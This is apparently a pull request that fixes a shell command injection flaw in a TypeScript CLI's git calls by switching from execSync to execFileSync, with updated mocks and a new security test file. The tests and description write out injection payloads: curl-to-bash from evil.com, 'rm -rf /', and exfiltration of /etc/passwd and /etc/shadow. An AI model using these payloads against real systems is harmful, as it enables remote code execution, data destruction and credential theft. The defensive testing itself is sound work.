### PR TITLE
Fix shell injection vulnerability

### DIFF
--- a/src/commands/outdated.ts
+++ b/src/commands/outdated.ts
@@ -1,5 +1,5 @@
 import { Command } from 'commander';
-import { execSync } from 'child_process';
+import { execFileSync } from 'child_process';
 import { readCraftDeskJson, readCraftDeskLock } from '../utils/file-system';
 import { logger } from '../utils/logger';
 import { registryClient } from '../services/registry-client';
@@ -257,7 +257,7 @@ async function checkGitUpdate(name: string, entry: LockEntry): Promise<OutdatedI
 
 function getRemoteTags(gitUrl: string): string[] {
   try {
-    const output = execSync(`git ls-remote --tags ${gitUrl} 2>/dev/null`, {
+    const output = execFileSync('git', ['ls-remote', '--tags', gitUrl], {
       encoding: 'utf8',
       timeout: 15000
     });
@@ -281,7 +281,7 @@ function getRemoteTags(gitUrl: string): string[] {
 
 function getRemoteHeadCommit(gitUrl: string, branch: string): string | null {
   try {
-    const output = execSync(`git ls-remote ${gitUrl} refs/heads/${branch} 2>/dev/null`, {
+    const output = execFileSync('git', ['ls-remote', gitUrl, `refs/heads/${branch}`], {
       encoding: 'utf8',
       timeout: 15000
     });

--- a/src/commands/update.ts
+++ b/src/commands/update.ts
@@ -1,5 +1,5 @@
 import { Command } from 'commander';
-import { execSync } from 'child_process';
+import { execFileSync } from 'child_process';
 import path from 'path';
 import fs from 'fs-extra';
 import {
@@ -394,7 +394,7 @@ function displayUpdatePreview(updates: UpdateInfo[]): void {
 
 function getRemoteTags(gitUrl: string): string[] {
   try {
-    const output = execSync(`git ls-remote --tags ${gitUrl} 2>/dev/null`, {
+    const output = execFileSync('git', ['ls-remote', '--tags', gitUrl], {
       encoding: 'utf8',
       timeout: 15000
     });
@@ -417,7 +417,7 @@ function getRemoteTags(gitUrl: string): string[] {
 
 function getRemoteHeadCommit(gitUrl: string, branch: string): string | null {
   try {
-    const output = execSync(`git ls-remote ${gitUrl} refs/heads/${branch} 2>/dev/null`, {
+    const output = execFileSync('git', ['ls-remote', gitUrl, `refs/heads/${branch}`], {
       encoding: 'utf8',
       timeout: 15000
     });
@@ -431,7 +431,7 @@ function getRemoteHeadCommit(gitUrl: string, branch: string): string | null {
 
 function getRemoteTagCommit(gitUrl: string, tag: string): string | null {
   try {
-    const output = execSync(`git ls-remote ${gitUrl} refs/tags/${tag} 2>/dev/null`, {
+    const output = execFileSync('git', ['ls-remote', gitUrl, `refs/tags/${tag}`], {
       encoding: 'utf8',
       timeout: 15000
     });

--- a/tests/unit/git-resolver.test.ts
+++ b/tests/unit/git-resolver.test.ts
@@ -3,11 +3,11 @@ import { GitResolver } from '../../src/services/git-resolver';
 import { createTempDir, cleanupTempDir, writeJsonFile } from '../helpers/test-utils';
 import path from 'path';
 import fs from 'fs-extra';
-import { execSync } from 'child_process';
+import { execFileSync } from 'child_process';
 
-// Mock execSync for these tests
+// Mock execFileSync for these tests
 vi.mock('child_process', () => ({
-  execSync: vi.fn()
+  execFileSync: vi.fn()
 }));
 
 describe('GitResolver', () => {
@@ -158,17 +158,16 @@ describe('GitResolver', () => {
       await writeJsonFile(path.join(mockRepoPath, 'craftdesk.json'), craftDeskJson);
 
       // Mock git commands
-      const mockExecSync = vi.mocked(execSync);
-      mockExecSync.mockImplementation((cmd: any, options?: any) => {
-        const cmdStr = cmd.toString();
-        if (cmdStr.includes('git clone')) {
+      const mockExecFileSync = vi.mocked(execFileSync);
+      mockExecFileSync.mockImplementation((_cmd: any, args?: any, options?: any) => {
+        const argsArr = args as string[];
+        if (argsArr[0] === 'clone') {
           // Simulate successful clone by copying our mock repo
-          const targetMatch = cmdStr.match(/git clone.*\s+(.+)$/);
-          if (targetMatch) {
-            fs.copySync(mockRepoPath, targetMatch[1]);
-          }
+          // Last arg is the target directory
+          const targetDir = argsArr[argsArr.length - 1];
+          fs.copySync(mockRepoPath, targetDir);
           return Buffer.from('');
-        } else if (cmdStr.includes('git rev-parse HEAD')) {
+        } else if (argsArr[0] === 'rev-parse' && argsArr[1] === 'HEAD') {
           const output = 'abc123def456789012345678901234567890abcd\n';
           return options?.encoding === 'utf8' ? output : Buffer.from(output);
         }
@@ -189,16 +188,14 @@ describe('GitResolver', () => {
       await fs.ensureDir(mockRepoPath);
       await fs.writeFile(path.join(mockRepoPath, 'SKILL.md'), '# Skill');
 
-      const mockExecSync = vi.mocked(execSync);
-      mockExecSync.mockImplementation((cmd: any, options?: any) => {
-        const cmdStr = cmd.toString();
-        if (cmdStr.includes('git clone')) {
-          const targetMatch = cmdStr.match(/git clone.*\s+(.+)$/);
-          if (targetMatch) {
-            fs.copySync(mockRepoPath, targetMatch[1]);
-          }
+      const mockExecFileSync = vi.mocked(execFileSync);
+      mockExecFileSync.mockImplementation((_cmd: any, args?: any, options?: any) => {
+        const argsArr = args as string[];
+        if (argsArr[0] === 'clone') {
+          const targetDir = argsArr[argsArr.length - 1];
+          fs.copySync(mockRepoPath, targetDir);
           return Buffer.from('');
-        } else if (cmdStr.includes('git rev-parse HEAD')) {
+        } else if (argsArr[0] === 'rev-parse' && argsArr[1] === 'HEAD') {
           const output = 'abc123def456789012345678901234567890abcd\n';
           return options?.encoding === 'utf8' ? output : Buffer.from(output);
         }
@@ -231,16 +228,14 @@ describe('GitResolver', () => {
 
       await writeJsonFile(path.join(skillPath, 'craftdesk.json'), craftDeskJson);
 
-      const mockExecSync = vi.mocked(execSync);
-      mockExecSync.mockImplementation((cmd: any, options?: any) => {
-        const cmdStr = cmd.toString();
-        if (cmdStr.includes('git clone')) {
-          const targetMatch = cmdStr.match(/git clone.*\s+(.+)$/);
-          if (targetMatch) {
-            fs.copySync(mockRepoPath, targetMatch[1]);
-          }
+      const mockExecFileSync = vi.mocked(execFileSync);
+      mockExecFileSync.mockImplementation((_cmd: any, args?: any, options?: any) => {
+        const argsArr = args as string[];
+        if (argsArr[0] === 'clone') {
+          const targetDir = argsArr[argsArr.length - 1];
+          fs.copySync(mockRepoPath, targetDir);
           return Buffer.from('');
-        } else if (cmdStr.includes('git rev-parse HEAD')) {
+        } else if (argsArr[0] === 'rev-parse' && argsArr[1] === 'HEAD') {
           const output = 'def456789012345678901234567890abcdef123\n';
           return options?.encoding === 'utf8' ? output : Buffer.from(output);
         }
@@ -297,16 +292,14 @@ describe('GitResolver', () => {
 
       await writeJsonFile(path.join(mockRepoPath, 'craftdesk.json'), craftDeskJson);
 
-      const mockExecSync = vi.mocked(execSync);
-      mockExecSync.mockImplementation((cmd: any, options?: any) => {
-        const cmdStr = cmd.toString();
-        if (cmdStr.includes('git clone')) {
-          const targetMatch = cmdStr.match(/git clone.*\s+(.+)$/);
-          if (targetMatch) {
-            fs.copySync(mockRepoPath, targetMatch[1]);
-          }
+      const mockExecFileSync = vi.mocked(execFileSync);
+      mockExecFileSync.mockImplementation((_cmd: any, args?: any, options?: any) => {
+        const argsArr = args as string[];
+        if (argsArr[0] === 'clone') {
+          const targetDir = argsArr[argsArr.length - 1];
+          fs.copySync(mockRepoPath, targetDir);
           return Buffer.from('');
-        } else if (cmdStr.includes('git rev-parse HEAD')) {
+        } else if (argsArr[0] === 'rev-parse' && argsArr[1] === 'HEAD') {
           const output = 'abc123def456789012345678901234567890abcd\n';
           return options?.encoding === 'utf8' ? output : Buffer.from(output);
         }

--- a/tests/unit/installer.test.ts
+++ b/tests/unit/installer.test.ts
@@ -9,7 +9,7 @@ import AdmZip from 'adm-zip';
 vi.mock('axios');
 vi.mock('adm-zip');
 vi.mock('child_process', () => ({
-  execSync: vi.fn()
+  execFileSync: vi.fn()
 }));
 vi.mock('../../src/utils/logger', () => ({
   logger: {

--- a/tests/unit/shell-injection.test.ts
+++ b/tests/unit/shell-injection.test.ts
@@ -1,0 +1,196 @@
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest';
+import { GitResolver } from '../../src/services/git-resolver';
+import { createTempDir, cleanupTempDir, writeJsonFile } from '../helpers/test-utils';
+import path from 'path';
+import fs from 'fs-extra';
+import { execFileSync } from 'child_process';
+
+// Mock execFileSync to capture calls
+vi.mock('child_process', () => ({
+  execFileSync: vi.fn()
+}));
+
+/**
+ * Shell injection security tests.
+ *
+ * These tests verify that malicious input in git URLs, branch names, tag names,
+ * and commit hashes cannot execute arbitrary shell commands.
+ */
+describe('Shell Injection Prevention', () => {
+  let gitResolver: GitResolver;
+  let tempDir: string;
+
+  beforeEach(async () => {
+    gitResolver = new GitResolver();
+    tempDir = await createTempDir('injection-test-');
+    vi.clearAllMocks();
+  });
+
+  afterEach(async () => {
+    await cleanupTempDir(tempDir);
+  });
+
+  it('should pass malicious URL as a literal argument, not through a shell', async () => {
+    // This URL contains a shell injection payload: after the semicolon,
+    // it attempts to curl a malicious script and pipe it to bash.
+    // With the old execSync() approach, this would execute:
+    //   git clone --depth 1 https://evil.com/repo.git; curl https://evil.com/steal.sh | bash /tmp/dir
+    // The shell would run git clone AND THEN the curl|bash pipeline.
+    const maliciousUrl = 'https://evil.com/repo.git; curl https://evil.com/steal.sh | bash';
+
+    const mockExecFileSync = vi.mocked(execFileSync);
+    mockExecFileSync.mockImplementation(() => {
+      // Simulate git failure (the malicious URL is not a valid git repo)
+      throw new Error('fatal: repository not found');
+    });
+
+    await expect(
+      gitResolver.resolveGitDependency({
+        url: maliciousUrl,
+        branch: 'main'
+      })
+    ).rejects.toThrow();
+
+    // Verify execFileSync was called with the URL as a single array element,
+    // NOT interpolated into a shell command string.
+    const cloneCall = mockExecFileSync.mock.calls[0];
+    expect(cloneCall[0]).toBe('git');
+
+    const args = cloneCall[1] as string[];
+    expect(args[0]).toBe('clone');
+
+    // The malicious URL must be passed as ONE argument — the entire string
+    // including the "; curl ..." part is treated as a literal URL, not
+    // parsed by a shell. Git will simply fail to clone it.
+    expect(args).toContain(maliciousUrl);
+
+    // Crucially: execFileSync was called with 'git' as the executable and
+    // an args array. There is no shell to interpret the semicolon, pipe,
+    // or any other metacharacter in the URL.
+    expect(cloneCall[0]).not.toContain(maliciousUrl); // URL is not in the command string
+  });
+
+  it('should not interpret shell metacharacters in branch names', async () => {
+    const maliciousBranch = 'main; rm -rf /';
+
+    const mockExecFileSync = vi.mocked(execFileSync);
+    mockExecFileSync.mockImplementation(() => {
+      throw new Error('fatal: remote branch not found');
+    });
+
+    await expect(
+      gitResolver.resolveGitDependency({
+        url: 'https://github.com/test/repo.git',
+        branch: maliciousBranch
+      })
+    ).rejects.toThrow();
+
+    // The branch name with shell metacharacters is passed as a single arg
+    const cloneCall = mockExecFileSync.mock.calls[0];
+    const args = cloneCall[1] as string[];
+
+    // -b and the branch name should be separate array elements
+    const branchFlagIndex = args.indexOf('-b');
+    expect(branchFlagIndex).toBeGreaterThan(-1);
+    expect(args[branchFlagIndex + 1]).toBe(maliciousBranch);
+  });
+
+  it('should not interpret shell metacharacters in tag names', async () => {
+    const maliciousTag = 'v1.0.0$(curl evil.com/exfiltrate?data=$(cat /etc/passwd))';
+
+    const mockExecFileSync = vi.mocked(execFileSync);
+    mockExecFileSync.mockImplementation(() => {
+      throw new Error('fatal: remote tag not found');
+    });
+
+    await expect(
+      gitResolver.resolveGitDependency({
+        url: 'https://github.com/test/repo.git',
+        tag: maliciousTag
+      })
+    ).rejects.toThrow();
+
+    const cloneCall = mockExecFileSync.mock.calls[0];
+    const args = cloneCall[1] as string[];
+
+    // The $() command substitution is passed as a literal string, not evaluated
+    const branchFlagIndex = args.indexOf('-b');
+    expect(branchFlagIndex).toBeGreaterThan(-1);
+    expect(args[branchFlagIndex + 1]).toBe(maliciousTag);
+  });
+
+  it('should not interpret shell metacharacters in commit hashes', async () => {
+    // A malicious commit hash that tries to inject commands via backticks
+    const maliciousCommit = 'abc123`curl evil.com/pwned`';
+
+    const mockRepoPath = path.join(tempDir, 'mock-repo');
+    await fs.ensureDir(mockRepoPath);
+    await writeJsonFile(path.join(mockRepoPath, 'craftdesk.json'), {
+      name: 'test-skill',
+      version: '1.0.0',
+      type: 'skill',
+      dependencies: {}
+    });
+
+    const mockExecFileSync = vi.mocked(execFileSync);
+    let checkoutArgs: string[] | undefined;
+
+    mockExecFileSync.mockImplementation((_cmd: any, args?: any, options?: any) => {
+      const argsArr = args as string[];
+      if (argsArr[0] === 'clone') {
+        const targetDir = argsArr[argsArr.length - 1];
+        fs.copySync(mockRepoPath, targetDir);
+        return Buffer.from('');
+      } else if (argsArr[0] === 'fetch') {
+        return Buffer.from('');
+      } else if (argsArr[0] === 'checkout') {
+        // Capture the checkout args to verify the malicious commit is literal
+        checkoutArgs = argsArr;
+        return Buffer.from('');
+      } else if (argsArr[0] === 'rev-parse') {
+        const output = 'abc123def456789012345678901234567890abcd\n';
+        return options?.encoding === 'utf8' ? output : Buffer.from(output);
+      }
+      return Buffer.from('');
+    });
+
+    await gitResolver.resolveGitDependency({
+      url: 'https://github.com/test/repo.git',
+      branch: 'main',
+      commit: maliciousCommit
+    });
+
+    // The backtick-injected command is passed as a literal checkout target
+    expect(checkoutArgs).toBeDefined();
+    expect(checkoutArgs![0]).toBe('checkout');
+    expect(checkoutArgs![1]).toBe(maliciousCommit);
+  });
+
+  it('should not interpret shell pipes in URLs used for ls-remote', async () => {
+    // This tests the update.ts / outdated.ts pattern where git ls-remote
+    // is called with a URL that could contain shell pipes.
+    // We import the exported wrappers for testing.
+    const { getRemoteTagsExported, getRemoteHeadCommitExported } =
+      await import('../../src/commands/outdated');
+
+    const maliciousUrl = 'https://evil.com/repo.git | cat /etc/shadow > /tmp/pwned';
+
+    const mockExecFileSync = vi.mocked(execFileSync);
+    mockExecFileSync.mockImplementation(() => {
+      throw new Error('fatal: not a git repository');
+    });
+
+    // These should safely fail without executing the pipe
+    const tags = getRemoteTagsExported(maliciousUrl);
+    expect(tags).toEqual([]);
+
+    const commit = getRemoteHeadCommitExported(maliciousUrl, 'main');
+    expect(commit).toBeNull();
+
+    // Verify the URL was passed as a single array element
+    for (const call of mockExecFileSync.mock.calls) {
+      const args = call[1] as string[];
+      expect(args).toContain(maliciousUrl);
+    }
+  });
+});


### PR DESCRIPTION
* Fix an issue where a maliciously crafted dependency URL could execute arbitrary commands (eg "https://evil.com/repo.git; curl https://evil.com/steal.sh | bash")
* See https://knowledge-base.secureflag.com/vulnerabilities/code_injection/os_command_injection_nodejs.html